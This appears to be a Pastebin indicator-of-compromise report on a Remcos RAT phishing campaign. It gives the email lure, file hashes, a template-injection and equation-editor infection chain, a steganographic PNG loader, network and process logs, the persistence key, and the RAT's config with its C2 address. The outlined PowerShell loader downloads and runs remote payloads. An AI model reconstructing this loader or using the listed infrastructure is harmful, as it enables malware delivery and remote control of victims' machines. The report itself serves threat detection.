API tools faq
paste
VRad

#remcos_190124

VRad
Jan 19th, 2024 (edited)
404
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.09 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
  2.  
  3. https://pastebin.com/EvXHfZUB
  4.  
  5. previous_contact:
  6. 18/01/24 https://pastebin.com/FL2fX362
  7. 25/12/23 https://pastebin.com/D535PVm3
  8. 21/12/23 https://pastebin.com/samYnJq6
  9. 30/11/23 https://pastebin.com/aG6XyqHN
  10. 13/11/23 https://pastebin.com/tbRpiGG5
  11. 06/02/23 https://pastebin.com/kjv5E8Au
  12.  
  13. FAQ:
  14. https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
  15.  
  16. attack_vector
  17. --------------
  18. email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
  19.  
  20. # # # # # # # #
  21. email_headers
  22. # # # # # # # #
  23. Date: 18 Jan 2024 22:57:35 -0800
  24. From: Velislav Deshev<info@cifogge.ooguy.com>
  25. Subject: RE: Потвърждение за плащане на фактура
  26. Received: from unknown (HELO mail0.cifogge.ooguy.com) ([79_141_163_23])
  27. Message-ID: <20240118225734.55E14297A16A5D59@cifogge.ooguy.com>
  28.  
  29. # # # # # # # #
  30. files
  31. # # # # # # # #
  32. SHA-256 fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd
  33. File name swift 19-1-2024.docx [ Microsoft Word 2007+ ] !Template Injection
  34. File size 30.64 KB (31376 bytes)
  35.  
  36. SHA-256 f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c
  37. File name microsoftdecidedtoup....doc [ Rich Text Format ] !11882 EQUATION
  38. File size 57.77 KB (59160 bytes)
  39.  
  40. SHA-256 5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa
  41. File name AItechnology.vbs [ JavaScript ] !Detect sandbox
  42. File size 13.94 KB (14272 bytes)
  43.  
  44. SHA-256 e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4
  45. File name UE4Lk [ JavaScript ] !Base64 2 PowerShell
  46. File size 46.70 KB (47816 bytes)
  47.  
  48. SHA-256 f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991
  49. File name uwp4228677.png [ PNG image data ] !Stego Loader BASE64_START
  50. File size 17.73 MB (18594320 bytes)
  51.  
  52. SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
  53. File name GRM.txt [ Reverse Base64 ] !REMCOS encoded payload
  54. File size 644.00 KB (659456 bytes)
  55.  
  56. # # # # # # # #
  57. activity
  58. # # # # # # # #
  59.  
  60. PL_SCR wallpapercave_com / uwp / uwp4228677.png (LOADER)
  61. 172_232_189_7 / 5060 / GRM.txt (REMCOS)
  62.  
  63. C2 top_noforabusers1_xyz 147_124_215_172 : 2424
  64.  
  65.  
  66. netwrk
  67. --------------
  68. 104_21_64_92 dik_si 80 HTTP HEAD /wOBjE HTTP/1.1 Microsoft Office Existence Discovery
  69. 172_232_189_7 172_232_189_7 80 HTTP GET /ait/microsoftdecidedtoupdateentireprocessfromtheserviceofmsofficetoinbuildtechnologytoimplementtheprocess.doc ms-office;
  70. 172_232_189_7 172_232_189_7 80 HTTP GET /5060/AItechnology.vbs HTTP/1.1 Mozilla/4.0
  71. 188_114_97_9 paste_ee 80 HTTP GET /d/UE4Lk HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  72. 188_114_97_9 paste_ee 443 TLSv1 Client Hello
  73. 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
  74. 172_232_189_7 172_232_189_7 80 HTTP GET /5060/GRM.txt HTTP/1.1
  75. 147_124_215_172 2424 TLSv1.3 Client Hello
  76.  
  77. comp
  78. --------------
  79. WINWORD.EXE TCP 104_21_64_92 80 ESTABLISHED
  80. WINWORD.EXE TCP 172_232_189_7 80 ESTABLISHED
  81. EQNEDT32.EXE TCP 172_232_189_7 80 ESTABLISHED
  82. WScript.exe TCP 188_114_97_9 443 ESTABLISHED
  83. powershell.exe TCP 104_22_53_71 443 ESTABLISHED
  84. powershell.exe TCP 172_232_189_7 80 CLOSE_WAIT
  85. RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
  86.  
  87. proc
  88. --------------
  89.  
  90. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
  91. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  92. "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\AItechnology.vbs"
  93. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = . . .
  94. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . . . ('172_232_189_7 / 5060 / GRM.txt' , 'C:\ProgramData\', 'LnkName','RegAsm')
  95.  
  96. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Copy-Item -Destination C:\ProgramData\Regasm.vbs
  97. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
  98.  
  99. persist
  100. --------------
  101. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.01.2024 14:09
  102. Path File not found: C:\ProgramData\Regasm.vbs.exe
  103.  
  104. drop
  105. --------------
  106. %temp%\Temporary Internet Files\Content.IE5\*\AItechnology[1].vbs
  107. C:\Users\operator\AppData\Roaming\AItechnology[1].vbs
  108.  
  109. # # # # # # # #
  110. additional info
  111. # # # # # # # #
  112. powershell load remcos:
  113. --------------
  114. image_Url = 'wallpapercave_com / uwp / uwp4228677.png'
  115. web_Client = System.Net.WebClient
  116. image_Bytes = DownloadData(image_Url)
  117. image_Text = UTF8.GetString(image_Bytes)
  118. start_Flag = <<BASE64_START>>; endFlag = <<BASE64_END>>
  119. base64_Command = image_Text_Substring
  120. command_Bytes = Convert ::From_Base64String
  121. loaded_Assembly = [System_Reflection.Assembly] :: Load (command_Bytes)
  122. type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
  123. method = Run . Invoke 172_232_189_7 / 5060 / GRM.txt desativado Regasm C:\ProgramData\ LnkName RegAsm
  124.  
  125. remcos config
  126. --------------
  127. {
  128. "Version": "4.9.3 Pro",
  129. "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
  130. "Assigned name": "RemoteHost",
  131. "Connect interval": "1",
  132. "Install flag": "Disable",
  133. "Setup HKCU\\Run": "Enable",
  134. "Setup HKLM\\Run": "Enable",
  135. "Install path": "Application path",
  136. "Copy file": "remcos.exe",
  137. "Startup value": "Disable",
  138. "Hide file": "Disable",
  139. "Mutex": "Rmc-M4OLK2",
  140. "Keylog flag": "0",
  141. "Keylog path": "Application path",
  142. "Keylog file": "logs.dat",
  143. "Keylog crypt": "Disable",
  144. "Hide keylog file": "Disable",
  145. "Screenshot flag": "Disable",
  146. "Screenshot time": "10",
  147. "Take Screenshot option": "Disable",
  148. "Take screenshot title": "",
  149. "Take screenshot time": "5",
  150. "Screenshot path": "AppData",
  151. "Screenshot file": "Screenshots",
  152. "Screenshot crypt": "Disable",
  153. "Mouse option": "Disable",
  154. "Delete file": "Disable",
  155. "Audio record time": "5"
  156. }
  157.  
  158. # # # # # # # #
  159. VT & Intezer
  160. # # # # # # # #
  161. https://www.virustotal.com/gui/file/fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd/details
  162. https://www.virustotal.com/gui/file/f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c/details
  163. https://www.virustotal.com/gui/file/5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa/details
  164. https://www.virustotal.com/gui/file/e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4/details
  165. https://www.virustotal.com/gui/file/f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991/details
  166. https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
  167.  
  168. VR
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!